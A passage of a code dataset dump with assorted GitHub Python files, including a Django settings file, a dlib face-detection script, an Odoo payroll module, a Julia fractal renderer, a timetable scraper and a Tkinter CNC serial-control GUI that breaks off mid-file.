'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.doc.XViewMiddleware',\n )\n\nROOT_URLCONF = 'ouds.urls'\n\nTEMPLATE_DIRS = (\n '/home/oudsus/Ouds/blog/templates',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.admin',\n \n 'ouds.utils',\n 'ouds.blog',\n)\n\n#=====================================\n# extend settings\n#=====================================\n\nTEMPLATE_STRING_IF_INVALID = \"Ouds.biz\"\nHOST_URL = 'http://Ouds.biz'\n\nSESSION_COOKIE_AGE = 60 * 30 # 30 minutes\n\n#CACHE_BACKEND = 'locmem:///'\n#CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True\n#CACHE_MIDDLEWARE_SECONDS = 60 * 5 # 5 minutes\n#CACHE_MIDDLEWARE_KEY_PREFIX = 'ouds'\n\n#===============================================================================\n# logging\n#===============================================================================\n\n#import logging\n\n#FORMAT='[%(asctime)s] %(levelname)s\\t%(message)s'\n#formatter = logging.Formatter(FORMAT)\n#logging.basicConfig(format=FORMAT, level=logging.DEBUG)\n","repo_name":"zzy/ouds-blog","sub_path":"src/settings_vps.py","file_name":"settings_vps.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15749518294","text":"# import the necessary packages\nfrom imutils import face_utils\nimport scipy\nimport imutils\nimport dlib\nimport cv2\nimport os\n\n\nusingWebcam = True\nisMotionDetecting = False\nisFaceDetecting = True\n\n\nimage_width = 0\nimage_path = \"lena.bmp\"\n\n#This dat file is NOT MINE and NOT LICENSED for any use other than playing around personally!!\ndownload_path = 'http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2'\nshape_predictor_path = \"shape_predictor_68_face_landmarks.dat\"\nzip_path = download_path.split('/')[-1]\ntemp_path = zip_path+'.download'\nif not os.path.exists(shape_predictor_path) : \n import shutil\n import requests\n import bz2\n \n if not os.path.exists(zip_path):\n with open(temp_path,'wb') as face_dat_file :\n face_dat_data = requests.get(download_path)\n face_dat_file.write(face_dat_data.content)\n shutil.move(temp_path,zip_path)\n \n with bz2.open(zip_path,'rb') as zip_file:\n data = zip_file.read()\n\n with open(shape_predictor_path,'wb') as dat_file:\n dat_file.write(data)\n\n #Cleanup zip file\n os.remove(zip_path)\n\n# initialize dlib's face detector (HOG-based) and then create\n# the facial landmark predictor\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(shape_predictor_path)\n\n\nwindow_name = 'Face Detection'\nwindow = cv2.namedWindow(window_name,cv2.WINDOW_NORMAL)\ncap = cv2.VideoCapture(0)\n\nif image_width : first_image = imutils.resize(cap.read()[1],width=image_width)\nelse : first_image = cap.read()[1]\nold_frame = cv2.cvtColor(first_image,cv2.COLOR_BGR2GRAY)\nolder_frame = old_frame.copy()\n\nif not image_width : image_width = old_frame.shape[1]\neye_weight = 0.5\nwhile True:\n # load the iscipyut image, resize it, and convert it to grayscale\n if usingWebcam:\n _,image = cap.read()\n else:\n image = cv2.imread(image_path)\n\n\n image = imutils.resize(image, width=image_width)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\n if isMotionDetecting :\n kernel = cv2.getStructuringElement(cv2.MORPH_CROSS,(3,3))\n\n blur = cv2.GaussianBlur( older_frame ,(3,3),3)\n\n for i in range(3): blur = cv2.GaussianBlur(blur,(3,3),3)\n\n #grad = cv2.morphologyEx(blur,cv2.MORPH_GRADIENT,kernel)\n\n motion_image = ( blur - blur.min() ).astype(float)\n #motion_image-= motion_image.min()\n sub_image = cv2.erode(motion_image,kernel,iterations=1).astype(float)\n\n sub_image += gray.astype(float)\n sub_image = (255 * sub_image/sub_image.max() ).astype(scipy.uint8)\n\n\n older_frame = (older_frame + old_frame)/2\n old_frame = ( old_frame + sub_image)/2\n\n sub_image = cv2.applyColorMap( sub_image ,cv2.COLORMAP_JET)\n\n else:\n sub_image = image\n\n rects = []\n if isFaceDetecting:\n # detect faces in the grayscale image\n rects = detector(gray, 1)\n\n # loop over the face detections\n for (i, rect) in enumerate(rects):\n \t# determine the facial landmarks for the face region, then\n \t# convert the landmark (x, y)-coordinates to a NumPy array\n\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n output = sub_image # face_utils.visualize_facial_landmarks(sub_image, shape)\n\n #loop over the face parts individually\n eyes_location = []\n eyes_area = []\n xs,ys = [],[]\n for (name, (i, j)) in face_utils.FACIAL_LANDMARKS_IDXS.items():\n # extract the ROI of the face region as a separate image\n bbox = cv2.boundingRect(scipy.array([shape[i:j]]))\n (x, y, w, h) = bbox\n xs.append(x) ; xs.append(x+w)\n ys.append(y) ; ys.append(y+h)\n\n if 'eye' in name and not 'brow' in name:\n eyes_location.append(bbox)\n eyes_area.append(w*h)\n\n eye_idx = scipy.argmax(eyes_area)\n eye_weight = 0.25*eye_idx + 0.75*eye_weight\n eye_idx = int(round(eye_weight))\n\n (x, y, w, h) = eyes_location[eye_idx]\n xr,yr = int(w/2),int(h/2)\n xc,yc = x+xr,y+yr\n cv2.rectangle(output,(x,y),(x + w , y + h),(0,255,0),3)\n cv2.ellipse(output,(xc,yc),(xr,yr),0,0,360,255,-1)\n\n eye_idx = not eye_idx\n (x, y, w, h) = eyes_location[eye_idx]\n xr,yr = int(w/2),int(h/2)\n xc,yc = x+xr,y+yr\n cv2.rectangle(output,(x,y),(x + w , y + h),(0,0,255),3)\n cv2.ellipse(output,(xc,yc),(xr,yr),0,0,360,255,-1)\n\n #Face rect\n minx,maxx = min(xs),max(xs)\n miny,maxy = min(ys),max(ys)\n miny = int(max(0,miny - 0.2 * (maxy-miny)))\n cv2.rectangle(output,(minx,miny),(maxx ,maxy),(0,255,0),3)\n\n\n \t# visualize all facial landmarks with a transparent overlay\n cv2.imshow(window_name, output)\n\n if not len(rects) or not isFaceDetecting : cv2.imshow(window_name, sub_image)\n\n\n\n\n keyPress = cv2.waitKey(1)\n\n\n","repo_name":"PhysicistJohn/eyeAF","sub_path":"detect_face_parts.py","file_name":"detect_face_parts.py","file_ext":"py","file_size_in_byte":5274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3000631825","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nExample for solar radiation on a tilted surface.\n\"\"\"\n\nfrom __future__ import division\n\nimport matplotlib.pyplot as plt\n\nimport pycity_base.classes.timer\nimport pycity_base.classes.weather\nimport pycity_base.classes.environment\n\n\ndef run_example(do_plot=False):\n # Create environment\n # Initialize the timer object for a full year computation, without rolling\n # horizon and hourly time discretization\n timer = pycity_base.classes.timer.Timer(3600, 8760, 8760, 8760)\n weather = pycity_base.classes.weather.Weather(timer)\n environment = pycity_base.classes.environment.Environment(timer, weather, None)\n\n # Surface definition\n beta = 30 # Slope, degree (not radians)\n gamma = 0 # Azimuth angle, degree (not radians)\n\n # Compute solar radiation on a tilted surface\n function = weather.getRadiationTiltedSurface\n solar_radiation_tilted_surface = function(beta, gamma, update=True)\n\n # The result is a tuple with four entries:\n # 0. Total radiation on the given surface\n # 1. Diffuse radiation on the given surface\n # 2. Direct radiation on the given surface\n # 3. Reflected radiation from the ground on the given surface\n # (The total radiation (index 0) is the sum of the other three)\n\n total_radiation = solar_radiation_tilted_surface[0]\n diffuse_radiation = solar_radiation_tilted_surface[1]\n direct_radiation = solar_radiation_tilted_surface[2]\n reflected_radiation = solar_radiation_tilted_surface[3]\n\n if do_plot:\n fig = plt.figure()\n fig.add_subplot(411)\n plt.plot(total_radiation)\n plt.ylabel('total_radiation')\n fig.add_subplot(412)\n plt.plot(diffuse_radiation)\n plt.ylabel('diffuse_radiation')\n fig.add_subplot(413)\n plt.plot(direct_radiation)\n plt.ylabel('direct_radiation')\n fig.add_subplot(414)\n plt.plot(reflected_radiation)\n plt.ylabel('reflected_radiation')\n plt.show()\n\n\nif __name__ == '__main__':\n run_example(do_plot=True)\n","repo_name":"RWTH-EBC/pyCity","sub_path":"pycity_base/examples/example_solar_radiation_tilted_surface.py","file_name":"example_solar_radiation_tilted_surface.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"24242197888","text":"#SonarGUI.py\n#Draws a GUI to the screen with\n#symbols to indicate sonar readings.\nimport sys, pygame\nfrom time import sleep\nclass SonarGUI:\n def __init__(self, scr):\n \n ###Draw the frame on the screen###\n self.screen = scr\n self.GREY = 50, 50, 50\n self.screen.fill(self.GREY)\n pygame.display.set_caption('Robot Control Interface')\n botImg = pygame.image.load(\"bot.png\")\n self.warnImg = pygame.image.load(\"warning.png\")\n self.okImg = pygame.image.load(\"ok.png\")\n self.qImg = pygame.image.load(\"q.png\")\n pygame.display.flip()\n #0 1 2 3\n #RF LF RB LB\n self.imgPositions = [(384, 0), (0, 0), (384, 384), (0, 384)]\n self.screen.blit(botImg, (107, 107))\n pygame.event.set_allowed(pygame.QUIT)\n pygame.mixer.music.load(\"buzzer.mp3\")\n ###################################\n self.OK = 0\n self.CLOSE = 1\n self.FAR = 2\n self.sonars = [self.FAR, self.FAR, self.FAR, self.FAR]\n for i in range(len(self.sonars)):\n self.screen.blit(self.qImg, self.imgPositions[i])\n pygame.display.flip()\n def updateSonars(self, readings):\n pygame.mixer.music.rewind()\n for i in range(len(self.sonars)):\n if self.sonars[i] != readings[i]: #Only update if it changes\n if readings[i] is self.OK:\n pygame.draw.rect(self.screen, self.GREY,pygame.Rect(self.imgPositions[i], (128, 128))) #Draw a rect over it\n self.screen.blit(self.okImg, self.imgPositions[i])\n self.sonars[i] = self.OK\n elif readings[i] is self.CLOSE:\n pygame.draw.rect(self.screen, self.GREY,pygame.Rect(self.imgPositions[i], (128, 128))) #Draw a rect over it\n self.screen.blit(self.warnImg, self.imgPositions[i])\n self.sonars[i] = self.CLOSE\n pygame.mixer.music.play() #Play warning sound\n elif readings[i] is self.FAR:\n pygame.draw.rect(self.screen, self.GREY,pygame.Rect(self.imgPositions[i], (128, 128))) #Draw a rect over it\n self.screen.blit(self.qImg, self.imgPositions[i])\n self.sonars[i] = self.FAR \n pygame.display.flip()\n\n","repo_name":"josephvcaustin/SeniorDesign2","sub_path":"Operator Side/SonarGUI.py","file_name":"SonarGUI.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42630887292","text":"# coding: utf-8\nfrom datetime import datetime\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT\nfrom dateutil.relativedelta import relativedelta\nfrom odoo import models, fields, api, _\nimport calendar\nfrom odoo.exceptions import UserError, ValidationError\n\nclass hr_tiempo_servicio(models.Model):\n _name = 'hr.payroll.prestaciones'\n _description = 'Tabla de Prestaciones'\n\n company_id = fields.Many2one(\"res.company\", string=\"Compañia\", default=lambda self: self.env.company)\n employee_id=fields.Many2one(\"hr.employee\",string=\"Empleado\")\n ano= fields.Integer()\n mes = fields.Integer(string='Mes cumplido')\n nro_mes = fields.Integer()\n sueldo_int_mensual = fields.Float()\n nro_ano = fields.Integer()\n dias_disfrutes = fields.Integer(string='Dias de prestaciones')\n alicuota = fields.Float()\n retiros = fields.Float()\n acumulado = fields.Float()\n\nclass HrPayslip(models.Model):\n _inherit = 'hr.payslip'\n\n ultimo_suldo_base_mensual = fields.Float()\n\n\n def action_payslip_done(self):\n #raise UserError(_('Prueba BEBE'))\n res = super(HrPayslip, self).action_payslip_done()\n sueldo_base_mensual=0.0001\n nro_ano=dias_disfrutes=alicuota=acumulado=0\n mes=0\n mes_nomina=self.mes(self.date_to)\n ano_actual=self.ano(self.date_to)\n valida=self.env['hr.payroll.prestaciones'].search([('employee_id','=',self.employee_id.id),('ano','=',ano_actual),('nro_mes','=',mes_nomina)])\n if not valida:\n if self.contract_id.wage>0:\n sueldo_base_mensual=self.contract_id.wage\n self.ultimo_suldo_base_mensual=sueldo_base_mensual\n if self.tiempo_antiguedad>0:\n nro_ano=self.tiempo_antiguedad\n indicadores=self.env['hr.payroll.indicadores.economicos'].search([('code','=','DUT')])\n if indicadores:\n for det_indi in indicadores:\n nro_dias_utilidades=det_indi.valor\n verifica=self.env['hr.payroll.prestaciones'].search([('employee_id','=',self.employee_id.id),('id','!=',self.id)],order=\"mes ASC\") #('ano','=',ano_actual)\n if verifica:\n #raise UserError(_('Ya hay una nomina procesada/pagada en el mes seleccionado para %s')%self.employee_id.name)\n for det_v in verifica:\n #acumulado=det_v.alicuota\n if det_v.mes==11:\n mes=0\n else:\n mes=det_v.mes+1\n if mes==3 or mes==6 or mes==9:\n dias_disfrutes=15\n if mes==0:\n busca_mes=self.env['hr.payroll.prestaciones'].search([('employee_id','=',self.employee_id.id),('mes','=','0'),('id','!=',self.id)],order=\"mes ASC\")\n if busca_mes:\n dias_disfrutes=15\n if not busca_mes:\n dias_disfrutes=0\n #if self.tiempo_antiguedad==0:\n #dias_disfrutes=15\n #if self.tiempo_antiguedad>0:\n #dias_disfrutes=self.dias_vacaciones+1\n sueldo_base_diario=sueldo_base_mensual/30\n fraccion_diaria_vaca=sueldo_base_diario*self.dias_vacaciones/360\n fraccion_diaria_utilidades=sueldo_base_diario*nro_dias_utilidades/360\n sueldo_integral_mensual=(sueldo_base_diario+fraccion_diaria_vaca+fraccion_diaria_utilidades)*30\n\n alicuota=(sueldo_integral_mensual/30)*dias_disfrutes\n acumulado=self.compute_acumulado()+alicuota\n\n ret = self.env['hr.payroll.prestaciones']\n values = {\n 'employee_id': self.employee_id.id,\n 'sueldo_int_mensual':sueldo_integral_mensual,\n 'nro_ano':nro_ano,\n 'mes':mes,\n 'nro_mes':mes_nomina,\n 'ano':self.ano(self.date_to),\n 'dias_disfrutes':dias_disfrutes,\n 'alicuota':alicuota,\n 'acumulado':acumulado,\n }\n rets=ret.create(values)\n\n def compute_acumulado(self):\n acum=0\n lista=self.env['hr.payroll.prestaciones'].search([('employee_id','=',self.employee_id.id),('id','!=',self.id),('nro_mes','!=',self.mes(self.date_to))])\n if lista:\n for det in lista:\n acum=acum+det.alicuota\n return acum\n\n def mes(self,date):\n fecha = str(date)\n fecha_aux=fecha\n mes=fecha[5:7]\n resultado=mes\n return int(resultado)\n\n def ano(self,date):\n fecha = str(date)\n fecha_aux=fecha\n ano=fecha_aux[0:4] \n resultado=ano\n return int(resultado)\n","repo_name":"jeffryjdelarosa/nomina_localizacion","sub_path":"hr_campos_parametrizacion/models/hr_prestaciones.py","file_name":"hr_prestaciones.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23671140518","text":"from enthought.traits.api import HasTraits, Range\n\n#--[Code]-----------------------------------------------------------------------\n\nclass GUISlider (HasTraits):\n\n def __init__(self, eval=None, label='Value', \n trait=None, min=0.0, max=1.0, \n initial=None, **traits):\n HasTraits.__init__(self, **traits)\n if trait is None:\n if min > max: \n min, max = max, min\n if initial is None:\n initial = min \n elif not (min <= initial <= max):\n initial = [min, max][\n abs(initial - min) > \n abs(initial - max)]\n trait = Range(min, max, value = initial)\n self.add_trait(label, trait)\n \n","repo_name":"fspaolo/misc-code","sub_path":"maps/build/Traits/examples/tutorials/doc_examples/examples/object_trait_attrs.py","file_name":"object_trait_attrs.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"18362417404","text":"from surgical_robotics_challenge.simulation_manager import SimulationManager\nfrom PyKDL import Vector, Rotation, Frame\nfrom surgical_robotics_challenge.utils.utilities import cartesian_interpolate_step\nimport numpy as np\nimport time\nfrom surgical_robotics_challenge.utils import coordinate_frames\n\n\nclass NeedleInitialization:\n def __init__(self, simulation_manager):\n self.T_needle_psmtip = coordinate_frames.Needle.T_center_psmtip\n self.T_needle_psmtip_far = self.T_needle_psmtip * Frame(Rotation.RPY(0., 0., 0.), Vector(0., 0., -0.010))\n\n self.needle = simulation_manager.get_obj_handle('Needle')\n time.sleep(1.0)\n self._release = False\n self._reached = False\n\n def get_tip_to_needle_offset(self):\n return self.T_needle_psmtip\n\n def move_to(self, psm_tip):\n print('Moving Needle to PSM 2 Tip')\n self._release = False\n if psm_tip is None:\n print('Not a valid link, returning')\n return\n T_nINw = self.needle.get_pose()\n T_tINw = psm_tip.get_pose()\n # First reach the farther point\n self._reached = False\n done = False\n while not done:\n T_nINw_cmd = T_tINw * self.T_needle_psmtip_far\n T_delta, done = cartesian_interpolate_step(T_nINw, T_nINw_cmd, 0.01, 0.005)\n r_delta = T_delta.M.GetRPY()\n # print(error_max)\n T_cmd = Frame()\n T_cmd.p = T_nINw.p + T_delta.p\n T_cmd.M = T_nINw.M * Rotation.RPY(r_delta[0], r_delta[1], r_delta[2])\n T_nINw = T_cmd\n self.needle.set_pose(T_cmd)\n time.sleep(0.01)\n\n time.sleep(0.5)\n done = False\n T_nINw = self.needle.get_pose()\n T_tINw = psm_tip.get_pose()\n while not done:\n T_nINw_cmd = T_tINw * self.T_needle_psmtip\n T_delta, done = cartesian_interpolate_step(T_nINw, T_nINw_cmd, 0.01, 0.005)\n r_delta = T_delta.M.GetRPY()\n T_cmd = Frame()\n T_cmd.p = T_nINw.p + T_delta.p\n T_cmd.M = T_nINw.M * Rotation.RPY(r_delta[0], r_delta[1], r_delta[2])\n T_nINw = T_cmd\n self.needle.set_pose(T_cmd)\n time.sleep(0.01)\n\n self._reached = True\n\n def release(self):\n print('Releasing Needle')\n self._release = True\n self.needle.set_force(Vector(0, 0, 0))\n self.needle.set_torque(Vector(0, 0, 0))\n\n def has_reached(self):\n return self._reached\n\n","repo_name":"surgical-robotics-ai/surgical_robotics_challenge","sub_path":"scripts/surgical_robotics_challenge/utils/task3_init.py","file_name":"task3_init.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"31122435143","text":"filename = 'mobydick.txt'\n\ntry:\n\twith open (filename, encoding= 'utf-8') as f:\n\t\tcontents = f.read()\nexcept FileNotFoundError:\n\tprint(f\"sorry, the file {filename} does not exist.\")\nelse:\n\twords = contents.lower().count('the ')\n\tprint(f\"The file {filename} has about {words} words saying 'the'.\")\n\n\n","repo_name":"StephanieLoomans/learning_python","sub_path":"common_words.py","file_name":"common_words.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19098245392","text":"class Solution:\n def minNumber(self, nums1: List[int], nums2: List[int]) -> int:\n nset=set(nums1)&set(nums2)\n if nset:\n return min(nset)\n else:\n first=min(nums1)\n second=min(nums2)\n if first>second:\n return int(str(second)+str(first))\n else:\n return int(str(first)+str(second))\n \n ","repo_name":"kalebwondimu33/LeetcodeSolutions","sub_path":"2605-form-smallest-number-from-two-digit-arrays/2605-form-smallest-number-from-two-digit-arrays.py","file_name":"2605-form-smallest-number-from-two-digit-arrays.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22716970623","text":"\"\"\"\n Finds the exit of the labyrinth\n Current solution: Find the spaces on the ouside not occupied by an obstacle\n Then look which one is reachable\n\"\"\"\nimport Pathfinding.A_Star as A_Star\nimport numpy as np\n\n\ndef scan(grid):\n exits = []\n\n # loops trough the outer frame of the grid an looks for free spaces\n for y in range(len(grid)):\n if grid[y][0] == 0:\n exits.append((0, y))\n if grid[y][grid.shape[1]-1] == 0:\n exits.append((grid.shape[1]-1, y))\n\n for x in range(grid.shape[1]):\n if grid[0][x] == 0:\n exits.append((x, 0))\n if grid[grid.shape[0]-1][x] == 0:\n exits.append((x, grid.shape[0]-1))\n\n # solves the path to the possible exits\n paths = []\n for pos in exits:\n current_grid = grid\n current_grid[pos[1]][pos[0]] = 3\n\n a_star_algorithm = A_Star.AStar(grid)\n path = a_star_algorithm.solve()\n if path:\n paths.append(a_star_algorithm.get_directions())\n\n # Takes the shortest one by comparing to the current path\n # (Beginning Value: longest path on a empty grid)\n shortest_path = np.zeros(shape=(grid.shape[0] * grid.shape[1], 1))\n for path in paths:\n shortest_path = path if len(path) < len(shortest_path) else shortest_path\n\n return shortest_path\n","repo_name":"Klark007/Selbstfahrendes-Auto-im-Modell","sub_path":"Pathfinding/Find_Exit.py","file_name":"Find_Exit.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"650123210","text":"import threading\nimport queue\nfrom complex import Complex, is_prisonier\nimport numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\nimport time\n\ndim = 2000\nn_thread = 1\n\ndiv = 2.5 / (dim/2)\nwidth = dim\nheigth = dim\n\nc = Complex.from_algebra(-1.2, 0)\n\n\nq = queue.Queue()\nend = np.zeros((width,heigth, 3))\ndef worker():\n dones = 0\n while True:\n x,y = q.get()\n z0 = Complex.from_algebra(x*div,y*div)\n end[int(x+width/2),int(y+heigth/2)] = is_prisonier(z0, c)[1]\n dones+=1\n if dones % int(dim**2 / 30) == 0:\n print(f\"[{threading.current_thread().getName()}] done {dones/n_thread/(dim**2)*100:.3}%\")\n q.task_done()\n\nfor i in range(n_thread):\n threading.Thread(target=worker, daemon=True).start()\n\nfor x in tqdm(range(int(-width/2), int(width/2), 1)):\n for y in range(int(-heigth/2), int(heigth/2), 1):\n q.put((x,y))\n\nq.join()\nprint('Fini les calules')\n","repo_name":"davidpcrd/julia-fractals","sub_path":"thread_fractal.py","file_name":"thread_fractal.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7048027239","text":"import urllib3, sqlite3\nfrom bs4 import BeautifulSoup\nfrom datetime import date, datetime\n\nurl = 'http://www.jkg-stuttgart.de/jkgdata/vertretungsplan/sa3_7a.htm'\nhttp = urllib3.PoolManager()\nresponse = http.request('GET', url)\ncreated_at = datetime.now()\n\nsoup = BeautifulSoup(response.data, 'html.parser')\n\ntable = soup.find('table', attrs = {'rules': 'all'})\n\ndata = []\nrows = table.find_all('tr')\nfor row in rows:\n\tcols = row.find_all('td')\n\tcols = [ele.text.strip() for ele in cols]\n\tcols = [created_at] + cols\n\tdata.append(cols)\n\n#print(data)\ndata = data[1:] #header entfernen\n\ndb = sqlite3.connect('jkgscrapedb.db', detect_types=sqlite3.PARSE_DECLTYPES|sqlite3.PARSE_COLNAMES)\ncursor = db.cursor()\ncursor.execute('CREATE TABLE IF NOT EXISTS rawdata (created_at timestamp, tag text, klassen text, fach text, stunde text, lehrer text, raum text, grund, text, vertretungs_text text, art text, verlegt_von text, ndruck text)')\n\n\ncursor.executemany(\"INSERT INTO rawdata(created_at, tag, klassen, fach, stunde, lehrer, raum, grund, vertretungs_text, art, verlegt_von, ndruck) VALUES(?,?,?,?,?,?,?,?,?,?,?,?)\", data)\n\ndb.commit()\ndb.close()","repo_name":"tfreitag98/jkgscrape","sub_path":"jkgscrape.py","file_name":"jkgscrape.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71591039847","text":"from tkinter import Tk, Toplevel,Frame,ttk,Text,DISABLED,Entry,NORMAL,Button\nimport serial.tools.list_ports\nfrom os import system, path, remove\nfrom pathlib import Path\nfrom time import sleep\nfrom sys import exit\nimport threading\nimport json\n\n# import pyvista as pv\n# from pyvistaqt import BackgroundPlotter,QtInteractor\n# import numpy as np\n\nfrom widgets import CustomMenuBar,CustomMenu\nfrom widgets import Plotter_Frame,DRO_Frame,Serial_Console_Frame,Warning_Frame,Manual_Control_Frame\nfrom widgets import Status_Bar\nfrom serial_connection import serial_port\n\nclass RootWindow(Tk):\n\n def __init__(self,title):\n super().__init__()\n self.main_window=MainWindow(self,title)\n self.main_window.overrideredirect(1)\n self.attributes(\"-alpha\",0.0)\n\n def onRootIconify(event):self.main_window.withdraw()\n self.bind(\"\",onRootIconify)\n def onRootDeiconify(event):\n self.main_window.deiconify()\n self.main_window.lift()\n self.bind(\"\",onRootDeiconify)\n self.bind(\"\",onRootDeiconify)\n\n self.main_window.lift()\n\nclass MainWindow(Toplevel):\n\n def __init__(self,parent,title):\n\n super().__init__(parent)\n self.parent=parent\n self.title(title)\n self.width=self.winfo_screenwidth()\n self.height=self.winfo_screenheight()\n self.geometry(\"{}x{}+{}+{}\".format(self.width,self.height,0,0))\n self.resizable(False,False)\n self.menubar_bg=\"#2b2b2b\"\n self.sidebars_bg=\"#303030\"\n self.window_bg=\"#1b1b1b\"\n self.file_item_bg=\"#404040\"\n self.configure(background=self.window_bg)\n\n self.maximized=False\n\n self.connection=serial_port()\n\n self.MAX_FPS=30\n \n #encryption key\n self.key=None\n\n #file_options flag\n self.file_options_menu=None\n\n #load settings\n with open(\"settings.json\",\"r\") as f:\n self.settings=json.load(f)\n\n #menubar\n self.menubar=CustomMenuBar(self,self.width,30,self.menubar_bg)\n self.menubar.place(x=0,y=0)\n\n # file menu\n self.file_menu=CustomMenu(self,bg=self.menubar_bg)\n self.file_menu.add_menu_item(label=\"Open GCode File\")\n self.menubar.add_menu(label=\"File\",menu=self.file_menu)\n\n # #Settings menu\n self.settings_menu=CustomMenu(self,bg=self.menubar_bg)\n # self.settings_menu.add_menu_item(label=\"Change key\",command=self.change_key)\n # self.settings_menu.add_menu_item(label=\"Export Key\")\n # self.settings_menu.add_menu_item(label=\"Import Key\")\n # self.settings_menu.add_menu_item(label=\"Destroy vault\")\n # self.settings_menu.add_menu_item(label=\"Export vault\")\n # self.settings_menu.add_menu_item(label=\"Import vault\")\n self.menubar.add_menu(label=\"Settings\",menu=self.settings_menu)\n\n # tools menu\n self.tools_menu=CustomMenu(self,bg=self.menubar_bg)\n self.menubar.add_menu(label=\"Tools\",menu=self.tools_menu)\n\n # status bar\n self.status_bar=Status_Bar(self,width=self.width-10,height=30)\n self.status_bar.place(x=5,y=self.height-35)\n self.status_bar.set_text('Disconnected')\n # self.status_bar=Frame(self)\n # self.status_bar.configure(width=self.width-10,height=30)\n # self.status_bar.place(x=5,y=self.height-35)\n\n # home frame\n # port + baudrate +connect/disconnect buttons at the top\n # then 3 columns for console+serial log, DRO, graphic representation\n # below that, manual control and surface mapping \n \n \n self.home_frame=Frame(self)\n self.home_frame_w=self.width-10\n self.home_frame_h=self.height-75\n self.home_frame.configure(width=self.home_frame_w,height=self.home_frame_h)\n self.home_frame.place(x=5,y=35)\n\n # port selecttion\n port_list=[]\n for port in serial.tools.list_ports.comports():\n port_list.append(port.device)\n self.port_dropdown=ttk.Combobox(self.home_frame,state='readonly',values=port_list)\n self.port_dropdown.current(0)\n self.port_dropdown.place(x=10,y=10,height=25)\n\n # baud selection\n self.baud_dropdown=ttk.Combobox(self.home_frame,state='readonly',values=['9600','14400','19200','38400','57600','115200','250000'])\n self.baud_dropdown.current(0)\n self.baud_dropdown.place(x=20+self.port_dropdown.winfo_reqwidth(),y=10,height=25)\n\n # connect/disconnect button\n self.connect_btn=ttk.Button(self.home_frame,text=\"Connect\",command=self.connect)\n self.connect_btn.place(x=30+self.baud_dropdown.winfo_reqwidth()+self.port_dropdown.winfo_reqwidth(),y=10)\n\n # serial console\n self.serial_console=Serial_Console_Frame(self.home_frame,self.connection,width=(self.home_frame_w-40)//3,height=(self.home_frame_h-40)//2)\n self.serial_console.place(x=10,y=40)\n\n # Graphic representation\n self.plotter_frame=Plotter_Frame(self.home_frame,width=(self.home_frame_w-40)//3,height=(self.home_frame_h-40)//2)\n self.plotter_frame.place(x=20+self.serial_console.winfo_reqwidth(),y=40)\n\n # \"DRO\" and homming\n self.dro_frame=DRO_Frame(self.home_frame,width=(self.home_frame_w-40)//3,height=(self.home_frame_h-40)//2)\n self.dro_frame.place(x=30+self.serial_console.winfo_reqwidth()+self.plotter_frame.winfo_reqwidth(),y=40)\n self.dro_frame.set_process_command_funtion(self.serial_console.send_command)\n\n # # self.test_warning=Warning_Frame(self.home_frame,warning_message=\"This is a warning\",width=500,height=200)\n # # self.test_warning.place(x=(self.width-500)//2,y=(self.height-200)//2)\n\n\n self.manual_control=Manual_Control_Frame(self.home_frame,width=260,height=235)\n self.manual_control.place(x=self.home_frame_w-270,y=50+((self.home_frame_h-40)//2))\n self.manual_control.set_command_handler(self.serial_console.send_command)\n\n self.bind('',self.quit)\n\n self.update_frames()\n\n def update_frames(self):\n if self.connection.is_connected():\n self.dro_frame.update_frame(self.serial_console.get_machine_pos())\n self.after(1000,self.update_frames)\n\n\n def connect(self):\n if not self.connection.is_connected():\n self.connection.config(port=self.port_dropdown.get(),baudrate=self.baud_dropdown.get())\n self.connection.connect()\n self.serial_console.connect()\n # self.serial_console.update_console()\n self.status_bar.set_text(f'Connected: {self.port_dropdown.get()}, {self.baud_dropdown.get()}')\n self.connect_btn.config(text=\"Disconnect\")\n else:\n self.connection.disconnect()\n self.status_bar.set_text('Disconnected')\n self.connect_btn.config(text=\"Connect\")\n self.serial_console.write_to_console('DISCONNECTED')\n \n # def load_graphics(self):\n # # Create a PyVista QtInteractor\n\n # self.plotter = BackgroundPlotter(window_size=(200,100))\n # self.plotter.renderer.background_color = \"white\"\n\n\n # # Define the dimensions of the grid\n # x_min, x_max = 0,20\n # y_min, y_max = 0,10\n # n_points = 200 # Adjust this to match the grid you generated\n\n # # Create a grid of x and y values\n # x_grid = np.linspace(x_min, 